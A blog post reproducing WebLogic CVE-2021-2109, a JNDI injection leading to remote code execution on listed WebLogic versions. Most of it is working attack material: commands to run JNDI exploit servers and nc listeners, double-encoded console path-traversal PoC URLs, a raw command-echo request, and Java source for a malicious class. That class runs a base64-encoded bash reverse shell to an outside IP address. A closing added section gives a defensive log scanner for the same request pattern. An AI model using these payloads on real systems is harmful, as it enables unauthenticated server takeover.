c1ay's blog

WebLogic CVE-2021-2109 JNDI injection remote code execution reproduction

2021/01/22

Affected versions

Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0

Exploitation method 1: no-echo exploitation (reverse shell)

1. Tool GitHub address:
https://github.com/welk1n/JNDI-Injection-Exploit/releases

Run on the VPS:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<reverse shell command>" -A "vpsip"

Listen on a port on the VPS:

nc -nvlp 8888

poc:

http://192.168.157.189:49163/console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://4x.xxx.xxx;xxx:1389/01hohc;AdminServer%22)

The reverse shell connects back successfully.

2. The issue can also be reproduced directly with the marshalsec-0.0.3-SNAPSHOT-all.jar tool:

Run on the VPS:

Start the JNDI server:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://vpsip:8080/#evilclass

Start the HTTP server:

python -m SimpleHTTPServer 8080

Place the malicious class file in the HTTP server's directory. The source of evilclass.class is as follows:

import java.lang.Runtime;
import java.lang.Process;

public class evilclass {
    // The constructor runs as soon as the class is loaded via the JNDI reference.
    public evilclass() {
        try {
            // base64-encoded reverse shell command, decoded and piped into bash
            String commands = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDUuMTg2LjE0Ni84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}";
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        evilclass e = new evilclass();
    }
}

Listen on a port on the VPS:

nc -nvlp 8888

poc:

http://192.168.157.189:49163/console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://4x.xxx.xxx;xxx:1389/evilclass;AdminServer%22)

Exploitation method 2: exploitation with command output echoed back

Tool GitHub address:
https://github.com/feihong-cs/JNDIExploit/releases/

Run on the VPS:

java -jar JNDIExploit-v1.11.jar -i vpsip

poc:

GET /console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://4x.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.157.189:49163
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
cmd: whoami
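Both PoC requests above share the same shape: a double-encoded `css/%252E%252E%252F` path that reaches consolejndi.portal without authentication, plus a JndiBindingHandle argument pointing at an attacker-controlled ldap:// URL. As an added, defensive example that is not part of the original post or of either tool, the Python script below scans constructed access-log lines for that pattern. It assumes the WebLogic access.log is in NCSA common log format; the sample lines and the 203.0.113.10 address are constructed, not taken from the post.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in NCSA common log format (assumed to be the
# WebLogic access.log layout in use); they are not logs from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jan/2021:10:01:02 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3120
10.0.0.9 - - [22/Jan/2021:10:02:15 +0800] "GET /console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://203.0.113.10:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1" 200 512
10.0.0.7 - - [22/Jan/2021:10:03:40 +0800] "GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true HTTP/1.1" 200 9001
"""

# Request line inside the quoted field of a common-log-format record.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A JndiBindingHandle whose argument points at a remote JNDI provider.
JNDI_URL_RE = re.compile(
    r'JndiBindingHandle\(\s*"?\s*(?P<scheme>ldaps?|rmi|iiop)://(?P<host>[^/;"\s)]+)',
    re.IGNORECASE,
)

def decode_twice(value):
    # The console path in the PoC is double URL-encoded (%252E%252E%252F),
    # so decode twice to see the ../ the server eventually resolves.
    return unquote(unquote(value))

def inspect_line(line):
    """Return a finding for one log line, or None if it looks benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    decoded = decode_twice(m.group("target"))
    path, _, query = decoded.partition("?")
    if "consolejndi.portal" not in path.lower():
        return None
    jndi = JNDI_URL_RE.search(query)
    if not jndi:
        return None  # ordinary use of the JNDI browser page
    return {
        "client": line.split(" ", 1)[0],
        "traversal": "../" in path.replace("\\", "/"),  # auth bypass via css/../
        "scheme": jndi.group("scheme").lower(),
        "host": jndi.group("host"),
    }

def scan(log_text):
    """Scan a whole log blob; returns a list of findings."""
    return [f for f in map(inspect_line, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with traversal set to True is the unauthenticated variant used by the PoC above; the same check with traversal False still catches a remote JNDI URL submitted through the console by an authenticated session.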
